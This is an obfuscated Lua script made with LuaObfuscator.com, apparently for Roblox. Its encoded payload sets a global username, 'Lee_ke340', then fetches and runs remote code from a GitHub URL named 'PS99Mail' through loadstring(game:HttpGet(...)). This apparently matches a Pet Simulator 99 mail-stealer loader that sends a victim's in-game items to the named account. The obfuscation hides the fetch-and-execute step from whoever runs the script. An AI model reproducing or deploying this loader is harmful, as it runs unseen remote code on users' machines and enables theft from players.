--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v70=0 -0 ;local v71;while true do if (v70==(0 -0)) then v71=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-(620 -(555 + 64))) -(v32-(932 -((1221 -364) + 74)))) + (569 -(367 + 201)))) ;return v71-(v71%(928 -(214 + 713))) ;end end else local v72=0;local v73;while true do if (v72==(0 + 0)) then v73=2^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (878 -(282 + 595))) or ((2702 -(68 + 997)) -(1523 + 103 + 11)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (12 -(966 -(892 + 65))) );v19=v19 + 4 ;return (v37 * (16777333 -(32 + 85))) + (v36 * (64226 + 1310)) + (v35 * (57 + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(2 -0)) then else local v75=0 + 0 ;local v76;while true do if (v75==(1474 -(1329 + 145))) then v76=0;while true do if (v76==(972 -(140 + 831))) then v38=1853 -(1409 + 441) ;break;end if (v76~=0) then else local v107=718 -(15 + 703) ;while true do if (v107==(0 + 0)) then v43=nil;v44=nil;v107=439 -(262 + 176) ;end if (v107==(1722 -(345 + 1376))) then v76=689 -(198 + 490) ;break;end end end end break;end end end if (v38~=(0 -0)) then else local v77=0 -0 ;local v78;while true do if (0==v77) then v78=1206 -(696 + 510) ;while true do if (v78==(1 -0)) then v38=1;break;end if (v78==(1262 -(1091 + 171))) then v39=0;v40=nil;v78=1;end end break;end end end if (v38==(1 + 0)) then local v79=0 -0 ;while true do if ((0 -0)~=v79) then else v41=nil;v42=nil;v79=375 -(123 + 251) ;end if (v79~=(4 -3)) then else v38=2;break;end end end if (v38==(701 -(208 + 490))) then v45=nil;while true do local v83=0 + 0 ;local v84;while true do if (v83~=0) then else v84=0;while true do if (v84==0) then local v108=0;while true do if (v108~=0) then else if (v39==(0 + 0)) then local v130=836 -(660 + 176) ;while true do if (v130~=1) then else v42={};v39=1;break;end if (v130==(0 + 0)) then local v183=0;local v184;while true do if (v183~=0) then else v184=0;while true do if (v184~=0) then else local v189=202 -(14 + 188) ;while true do if (v189==1) then v184=676 -(534 + 141) ;break;end if (v189==(0 + 0)) then v40={};v41={};v189=1;end end end if (v184~=(1 + 0)) then else v130=1;break;end end break;end end end end end if (v39==(1 + 0)) then local v131=0 -0 ;local v132;local v133;while true do if (v131==(0 -0)) then v132=0 -0 ;v133=nil;v131=1;end if (1==v131) then while true do if (v132~=(0 + 0)) then else v133=0;while true do if (v133~=(0 + 0)) then else local v190=396 -(115 + 281) ;local v191;while true do if (v190==(0 -0)) then v191=0;while true do if (v191==(0 + 0)) then local v199=0;while true do if (v199==1) then v191=2 -1 ;break;end if (v199==0) then v43={v40,v41,nil,v42};v44=v24();v199=1 -0 ;end end end if (v191~=1) then else v133=1 -0 ;break;end end break;end end end if (v133==1) then v45={};v39=2;break;end end break;end end break;end end end v108=1;end if (v108==1) then v84=1;break;end end end if (v84==1) then if (v39==3) then local v109=0 -0 ;local v110;local v111;while true do if (v109==(285 -(134 + 151))) then v110=1665 -(970 + 695) ;v111=nil;v109=1;end if (v109~=(1 -0)) then else while true do if (v110==(1990 -(582 + 1408))) then v111=0 -0 ;while true do if (v111==(0 -0)) then local v187=0 -0 ;while true do if (v187==(1824 -(1195 + 629))) then for v192=1 -0 ,v24() do v41[v192-(242 -(187 + 54)) ]=v29();end return v43;end end end end break;end end break;end end end if (v39~=(782 -(162 + 618))) then else local v112=0 + 0 ;while true do if (v112==1) then for v157=1,v24() do local v158=0 + 0 ;local v159;local v160;local v161;while true do if ((0 -0)==v158) then v159=0;v160=nil;v158=1;end if (v158==(1 -0)) then v161=nil;while true do if (v159~=(0 + 0)) then else v160=1636 -(1373 + 263) ;v161=nil;v159=1;end if (v159==(1001 -(451 + 549))) then while true do if ((0 + 0)==v160) then v161=v22();if (v21(v161,1,1 -0 )==0) then local v194=0;local v195;local v196;local v197;local v198;while true do if (v194==(2 -0)) then while true do if (v195==(1386 -(746 + 638))) then if (v21(v197,1 + 0 ,1 -0 )==1) then v198[343 -(218 + 123) ]=v45[v198[2]];end if (v21(v197,1583 -(1535 + 46) ,2 + 0 )~=(1 + 0)) then else v198[563 -(306 + 254) ]=v45[v198[3]];end v195=1 + 2 ;end if (1==v195) then local v201=0 -0 ;while true do if (v201==1) then v195=1469 -(899 + 568) ;break;end if (v201==0) then v198={v23(),v23(),nil,nil};if (v196==(0 -0)) then local v210=603 -(268 + 335) ;local v211;local v212;while true do if (v210==1) then while true do if (v211==(290 -(60 + 230))) then v212=572 -(426 + 146) ;while true do if (v212~=(0 + 0)) then else v198[3]=v23();v198[1460 -(282 + 1174) ]=v23();break;end end break;end end break;end if (v210==(811 -(569 + 242))) then v211=0;v212=nil;v210=2 -1 ;end end elseif (v196==1) then v198[1 + 2 ]=v24();elseif (v196==2) then v198[3]=v24() -((1026 -(706 + 318))^(1267 -(721 + 530))) ;elseif (v196==3) then local v215=0;local v216;while true do if (v215==0) then v216=0;while true do if (v216==0) then v198[3]=v24() -(2^16) ;v198[4]=v23();break;end end break;end end end v201=1272 -(945 + 326) ;end end end if ((0 -0)==v195) then local v202=0 + 0 ;while true do if (v202==0) then v196=v21(v161,2,3);v197=v21(v161,4,706 -(271 + 429) );v202=1 + 0 ;end if (v202==(1501 -(1408 + 92))) then v195=1087 -(461 + 625) ;break;end end end if (v195==3) then if (v21(v197,1291 -(993 + 295) ,3)==(1 + 0)) then v198[4]=v45[v198[1175 -(418 + 753) ]];end v40[v157]=v198;break;end end break;end if (v194==0) then v195=0 + 0 ;v196=nil;v194=1;end if (v194==1) then local v200=0 + 0 ;while true do if (v200~=0) then else v197=nil;v198=nil;v200=1;end if (v200~=1) then else v194=1 + 1 ;break;end end end end end break;end end break;end end break;end end end v39=1 + 2 ;break;end if (v112==0) then for v162=1,v44 do local v163=0;local v164;local v165;local v166;while true do if (v163==(530 -(406 + 123))) then v166=nil;while true do if (0==v164) then v165=v22();v166=nil;v164=1;end if ((1770 -(1749 + 20))==v164) then if (v165==1) then v166=v22()~=(0 + 0) ;elseif (v165==2) then v166=v25();elseif (v165~=3) then else v166=v26();end v45[v162]=v166;break;end end break;end if (0~=v163) then else v164=1322 -(1249 + 73) ;v165=nil;v163=1;end end end v43[3]=v22();v112=1;end end end break;end end break;end end end break;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=0 + 0 ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (v46==(1 + 0)) then v49=1 -0 ;v50=(v21(v48,1146 -(466 + 679) ,48 -28 ) * ((5 -3)^32)) + v47 ;v46=1902 -(106 + 1794) ;end if ((0 + 0)==v46) then v47=v24();v48=v24();v46=(739 -(542 + 196)) + 0 ;end if (v46==(5 -3)) then v51=v21(v48,(2643 -1410) -(323 + 889) ,83 -52 );v52=((v21(v48,146 -(4 + 110) )==(321 -(53 + 78 + 189))) and  -(1 + 0)) or (414 -(15 + 398)) ;v46=587 -(57 + 527) ;end if (v46==(1430 -(41 + 705 + 681))) then if (v51==0) then if (v50==(103 -(17 + 86))) then return v52 * (0 + 0) ;else v51=1 -0 ;v49=0 + 0 + 0 ;end elseif (v51==(5927 -3880)) then return ((v50==(166 -(122 + 44))) and (v52 * ((1 -0)/(0 + 0)))) or (v52 * NaN) ;end return v8(v52,v51-(3393 -2370) ) * (v49 + (v50/((2 + 0)^52))) ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 -0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(2 -1) );v19=v19 + v53 ;local v55={};for v68=1552 -(1126 + 425) , #v54 do v55[v68]=v2(v1(v3(v54,v68,v68)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57=0;local v58;local v59;while true do if (v57==((1841 -1435) -(118 + 63 + 224))) then return (v59 * (1003 -747)) + v58 ;end if (v57==(1121 -(118 + 1003))) then v58,v59=v1(v16,v19,v19 + 2 );v19=v19 + ((982 -(553 + 424)) -3) ;v57=378 -(142 + 235) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v60)if (v1(v60,2)==79) then v20=v0(v3(v60,1,1));return "";else local v74=v2(v0(v60,16));if v20 then local v85=v5(v74,v20);v20=nil;return v85;else return v74;end end end);v18=1;end if (v18==7) then function v30(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v86=v65;local v87=v66;local v88=v67;local v89=v28;local v90=1;local v91= -1;local v92={};local v93={...};local v94=v12("#",...) -1 ;local v95={};local v96={};for v100=0,v94 do if (v100>=v88) then v92[v100-v88 ]=v93[v100 + 1 ];else v96[v100]=v93[v100 + 1 ];end end local v97=(v94-v88) + 1 ;local v98;local v99;while true do v98=v86[v90];v99=v98[1];if (v99<=10) then if (v99<=4) then if (v99<=1) then if (v99>0) then do return;end else local v113=v98[2];local v114,v115=v89(v96[v113](v13(v96,v113 + 1 ,v98[3])));v91=(v115 + v113) -1 ;local v116=0;for v125=v113,v91 do v116=v116 + 1 ;v96[v125]=v114[v116];end end elseif (v99<=2) then v96[v98[2]]();elseif (v99>3) then if (v96[v98[2]]==v98[4]) then v90=v90 + 1 ;else v90=v98[3];end else local v135=v98[2];local v136=v96[v98[3]];v96[v135 + 1 ]=v136;v96[v135]=v136[v98[4]];end elseif (v99<=7) then if (v99<=5) then if (v96[v98[2]]==v98[4]) then v90=v90 + 1 ;else v90=v98[3];end elseif (v99>6) then local v141=v98[2];local v142,v143=v89(v96[v141](v13(v96,v141 + 1 ,v98[3])));v91=(v143 + v141) -1 ;local v144=0;for v167=v141,v91 do v144=v144 + 1 ;v96[v167]=v142[v144];end else v63[v98[3]]=v96[v98[2]];end elseif (v99<=8) then v96[v98[2]]=v98[3];elseif (v99>9) then v90=v98[3];else v63[v98[3]]=v96[v98[2]];end elseif (v99<=15) then if (v99<=12) then if (v99>11) then for v128=v98[2],v98[3] do v96[v128]=nil;end else local v119=0;local v120;while true do if (v119==0) then v120=v98[2];v96[v120]=v96[v120](v13(v96,v120 + 1 ,v91));break;end end end elseif (v99<=13) then local v121=0;local v122;local v123;while true do if (v121==0) then v122=v98[2];v123=v96[v98[3]];v121=1;end if (v121==1) then v96[v122 + 1 ]=v123;v96[v122]=v123[v98[4]];break;end end elseif (v99==14) then v96[v98[2]]();else do return;end end elseif (v99<=18) then if (v99<=16) then v90=v98[3];elseif (v99>17) then v96[v98[2]]=v98[3];elseif ((v98[3]=="_ENV") or (v98[3]=="getfenv")) then v96[v98[2]]=v63;else v96[v98[2]]=v63[v98[3]];end elseif (v99<=19) then if ((v98[3]=="_ENV") or (v98[3]=="getfenv")) then v96[v98[2]]=v63;else v96[v98[2]]=v63[v98[3]];end elseif (v99>20) then local v155=0;local v156;while true do if (0==v155) then v156=v98[2];v96[v156]=v96[v156](v13(v96,v156 + 1 ,v91));break;end end else for v177=v98[2],v98[3] do v96[v177]=nil;end end v90=v90 + 1 ;end end;end if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!073O00028O0003083O00557365726E616D6503093O004C2O655F6B65333430030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O002O123O00014O000C000100013O0026043O00020001000100040A3O00020001002O12000100013O002604000100050001000100040A3O00050001002O12000200033O001206000200023O001213000200043O001213000300053O002003000300030006002O12000500074O0007000300054O001500023O00022O000200020001000100040A3O0014000100040A3O0005000100040A3O0014000100040A3O000200012O00013O00017O00",v9(),...);
